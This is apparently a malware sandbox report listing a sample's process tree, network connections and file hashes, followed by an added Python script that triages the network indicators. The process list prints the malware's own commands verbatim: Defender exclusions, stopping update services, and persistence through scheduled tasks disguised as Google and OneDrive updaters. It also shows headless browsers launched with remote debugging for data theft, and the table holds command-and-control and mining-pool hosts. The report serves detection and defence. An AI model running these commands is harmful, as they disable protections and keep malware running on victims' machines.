PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2380 wrote to memory of 1664 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2888 -ip 2888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=32378 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataIEK8V" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9aa3c9758,0x7ff9aa3c9768,0x7ff9aa3c9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1380 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1668 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=32378 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2016 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#usqnxrsejgruozk#> powershell <#usqnxrsejgruozk#> -Verb <#usqnxrsejgruozk#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=32378 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2436 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=32378 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2420 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=32378 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3216 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=32378 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2552 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=32378 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3516 --field-trial-handle=1452,i,12284341349177207831,9265141565800836784,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 13:29 /f /tn OneDriveUpdateTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 13:29 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=37489 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM" --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataD2UCM" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9c05f46f8,0x7ff9c05f4708,0x7ff9c05f4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1508 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1868 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2000 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=37489 --allow-pre-commit-input --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1376,7588824095357734710,2530637292374620865,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=audio --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=2424 /prefetch:8

Network

Country Destination           Domain                        Proto
(Domain "-" = no hostname recorded for the connection)
US      8.8.8.8:53            126.134.241.8.in-addr.arpa    udp
US      8.8.8.8:53            158.240.127.40.in-addr.arpa   udp
NL      136.244.98.226:33587  -                             tcp
US      8.8.8.8:53            75.159.190.20.in-addr.arpa    udp
US      8.8.8.8:53            108.211.229.192.in-addr.arpa  udp
US      8.8.8.8:53            226.98.244.136.in-addr.arpa   udp
US      8.8.8.8:53            transfer.sh                   udp
DE      144.76.136.153:443    transfer.sh                   tcp
US      8.8.8.8:53            153.136.76.144.in-addr.arpa   udp
US      8.8.8.8:53            198.187.3.20.in-addr.arpa     udp
US      8.8.8.8:53            www.microsoft.com             udp
NL      104.85.1.163:80       www.microsoft.com             tcp
NL      104.85.1.163:443      www.microsoft.com             tcp
US      8.8.8.8:53            163.1.85.104.in-addr.arpa     udp
US      8.8.8.8:53            ip-api.com                    udp
US      208.95.112.1:80       ip-api.com                    tcp
RU      185.159.129.168:80    -                             tcp
US      8.8.8.8:53            86.8.109.52.in-addr.arpa      udp
US      8.8.8.8:53            1.112.95.208.in-addr.arpa     udp
RU      185.149.146.118:80    -                             tcp
RU      77.91.77.144:80       -                             tcp
US      8.8.8.8:53            8.3.197.209.in-addr.arpa      udp
US      8.8.8.8:53            pastebin.com                  udp
US      172.67.34.170:80      pastebin.com                  tcp
US      172.67.34.170:443     pastebin.com                  tcp
RU      46.29.235.84:80       46.29.235.84                  tcp
US      8.8.8.8:53            170.34.67.172.in-addr.arpa    udp
US      8.8.8.8:53            84.235.29.46.in-addr.arpa     udp
N/A     224.0.0.251:5353      -                             udp
US      8.8.8.8:53            196.168.217.172.in-addr.arpa  udp
US      8.8.8.8:53            195.179.250.142.in-addr.arpa  udp
US      8.8.8.8:53            youtube.com                   udp
NL      216.58.214.14:443     youtube.com                   tcp
US      8.8.8.8:53            ogs.google.com                udp
US      8.8.8.8:53            apis.google.com               udp
NL      142.250.179.206:443   ogs.google.com                tcp
US      8.8.8.8:53            i.ytimg.com                   udp
NL      142.250.179.214:443   i.ytimg.com                   tcp
US      8.8.8.8:53            14.214.58.216.in-addr.arpa    udp
US      8.8.8.8:53            206.179.250.142.in-addr.arpa  udp
US      8.8.8.8:53            206.23.217.172.in-addr.arpa   udp
US      8.8.8.8:53            accounts.google.com           udp
NL      142.250.179.141:443   accounts.google.com           tcp
NL      142.250.179.141:443   accounts.google.com           udp
US      8.8.8.8:53            play.google.com               udp
NL      142.251.36.14:443     play.google.com               tcp
US      8.8.8.8:53            131.179.250.142.in-addr.arpa  udp
US      8.8.8.8:53            214.179.250.142.in-addr.arpa  udp
US      8.8.8.8:53            106.208.58.216.in-addr.arpa   udp
US      8.8.8.8:53            141.179.250.142.in-addr.arpa  udp
NL      142.251.36.14:443     play.google.com               udp
NL      142.251.36.14:443     play.google.com               udp
US      8.8.8.8:53            googleads.g.doubleclick.net   udp
NL      142.250.179.194:443   googleads.g.doubleclick.net   tcp
US      8.8.8.8:53            194.179.250.142.in-addr.arpa  udp
US      8.8.8.8:53            194.23.217.172.in-addr.arpa   udp
NL      142.250.179.194:443   googleads.g.doubleclick.net   udp
US      8.8.8.8:53            accounts.google.com           udp
NL      142.250.179.141:443   accounts.google.com           tcp
US      8.8.8.8:53            stratum-eu.rplant.xyz         udp
FR      141.94.192.217:17056  stratum-eu.rplant.xyz         tcp
US      8.8.8.8:53            217.192.94.141.in-addr.arpa   udp
N/A     127.0.0.1:32378       -                             tcp
N/A     127.0.0.1:32378       -                             tcp
N/A     127.0.0.1:32378       -                             tcp
N/A     127.0.0.1:32378       -                             tcp
US      8.8.8.8:53            210.143.182.52.in-addr.arpa   udp
NL      142.250.179.214:443   i.ytimg.com                   tcp
NL      142.250.179.141:443   accounts.google.com           tcp
NL      142.250.179.141:443   accounts.google.com           udp
US      8.8.8.8:53            googleads.g.doubleclick.net   udp
NL      142.251.36.34:443     googleads.g.doubleclick.net   tcp
US      8.8.8.8:53            34.36.251.142.in-addr.arpa    udp
NL      142.251.36.34:443     googleads.g.doubleclick.net   udp
N/A     127.0.0.1:37489       -                             tcp
N/A     127.0.0.1:37489       -                             tcp
N/A     127.0.0.1:37489       -                             tcp
N/A     127.0.0.1:37489       -                             tcp
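
Most rows in the table are reverse lookups (in-addr.arpa) of addresses already listed, plus first-party Google and Microsoft traffic from the headless browser sessions. The rows worth turning into indicators are the DNS queries for transfer.sh, ip-api.com, pastebin.com and stratum-eu.rplant.xyz, the HTTP connections to Russian-hosted addresses with no hostname recorded (direct-to-IP), the connection to 141.94.192.217:17056, and the loopback connections to ports 32378 and 37489, which are the --remote-debugging-port values of the chrome.exe and msedge.exe processes above. The following Python is an added example, not part of the report: it parses the table as the page prints it (the Domain column is absent on some rows), discards reverse lookups and multicast, counts loopback connections per DevTools port, and tags each external endpoint. ROWS is a subset of the table copied verbatim; DEVTOOLS_PORTS comes from the command lines; LOW_PRIORITY_SUFFIXES is this example's own assumption about which traffic to read last, not a claim that it is benign.

```python
"""Triage of the Network table above.

Added example, not code from the sandbox or the report.  ROWS is a subset
of the table copied verbatim; DEVTOOLS_PORTS comes from the
--remote-debugging-port values in the chrome.exe / msedge.exe command
lines; LOW_PRIORITY_SUFFIXES is this example's own assumption about which
first-party browser traffic to read last, not a verdict that it is benign.
"""
import ipaddress

# Constructed sample: rows copied from the Network table (three or four columns).
ROWS = """\
US 8.8.8.8:53 126.134.241.8.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 185.159.129.168:80 tcp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
N/A 224.0.0.251:5353 udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
N/A 127.0.0.1:32378 tcp
N/A 127.0.0.1:32378 tcp
N/A 127.0.0.1:37489 tcp
"""

# From --remote-debugging-port= in the browser command lines of this report.
DEVTOOLS_PORTS = {32378: "chrome.exe", 37489: "msedge.exe"}
# Assumption for this example only: first-party browser noise to deprioritise.
LOW_PRIORITY_SUFFIXES = (".google.com", "youtube.com", ".ytimg.com", "doubleclick.net", "microsoft.com")


def parse_rows(text):
    """Split the space-separated table; the Domain column is absent on some rows."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            (country, dest, proto), domain = parts, ""
        else:
            raise ValueError(f"unexpected row: {line!r}")
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto})
    return rows


def classify(row):
    """rdns / dns / devtools / loopback / multicast / external."""
    ip = ipaddress.ip_address(row["ip"])
    if row["domain"].endswith(".in-addr.arpa"):
        return "rdns"           # reverse lookups of addresses already in the table
    if row["port"] == 53:
        return "dns"
    if ip.is_loopback:
        return "devtools" if row["port"] in DEVTOOLS_PORTS else "loopback"
    if ip.is_multicast:
        return "multicast"      # 224.0.0.251:5353 is mDNS
    return "external"


def triage(text):
    queried, external, devtools = [], [], {}
    for r in parse_rows(text):
        kind = classify(r)
        if kind == "dns" and r["domain"] not in queried:
            queried.append(r["domain"])
        elif kind == "devtools":
            key = (DEVTOOLS_PORTS[r["port"]], r["port"])
            devtools[key] = devtools.get(key, 0) + 1
        elif kind == "external":
            flags = []
            if not r["domain"] or r["domain"] == r["ip"]:
                flags.append("direct-to-ip")
            if r["domain"].endswith(LOW_PRIORITY_SUFFIXES):
                flags.append("low-priority")
            if r["port"] not in (80, 443):
                flags.append("non-web-port")
            external.append((f'{r["ip"]}:{r["port"]}', r["domain"], flags))
    return {"queried": queried, "external": external, "devtools": devtools}


if __name__ == "__main__":
    result = triage(ROWS)
    print("queried:", result["queried"])
    print("devtools connections:", result["devtools"])
    for dest, domain, flags in result["external"]:
        print(f"{dest:<22} {domain or '-':<24} {' '.join(flags)}")
```

The loopback counter ties the network table back to the process list: each connection to 127.0.0.1:32378 or :37489 is a client talking to the DevTools listener of the headless browser, which is the channel through which the profile data the report flags as read can be pulled out of a live session. The external list, with direct-to-IP and non-web-port tags, is what goes into the blocklist; the low-priority tag only orders the review.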

Files

memory/4612-134-0x0000000074960000-0x0000000075110000-memory.dmp

memory/4612-133-0x00000000008C0000-0x00000000008F4000-memory.dmp

memory/4612-135-0x0000000005990000-0x0000000005FA8000-memory.dmp

memory/4612-136-0x0000000005480000-0x000000000558A000-memory.dmp

memory/4612-138-0x0000000005360000-0x0000000005370000-memory.dmp

memory/4612-137-0x0000000005390000-0x00000000053A2000-memory.dmp

memory/4612-139-0x00000000053F0000-0x000000000542C000-memory.dmp

memory/4612-140-0x0000000005700000-0x0000000005776000-memory.dmp

memory/4612-141-0x0000000005820000-0x00000000058B2000-memory.dmp

memory/4612-142-0x0000000006A50000-0x0000000006FF4000-memory.dmp

memory/4612-143-0x0000000074960000-0x0000000075110000-memory.dmp

memory/4612-144-0x00000000058C0000-0x0000000005926000-memory.dmp

memory/4612-145-0x0000000005360000-0x0000000005370000-memory.dmp

memory/4612-146-0x0000000006710000-0x0000000006760000-memory.dmp

memory/4612-147-0x00000000071D0000-0x0000000007392000-memory.dmp

memory/4612-148-0x0000000007C20000-0x000000000814C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/4700-169-0x00007FF72D1D0000-0x00007FF72E3F6000-memory.dmp

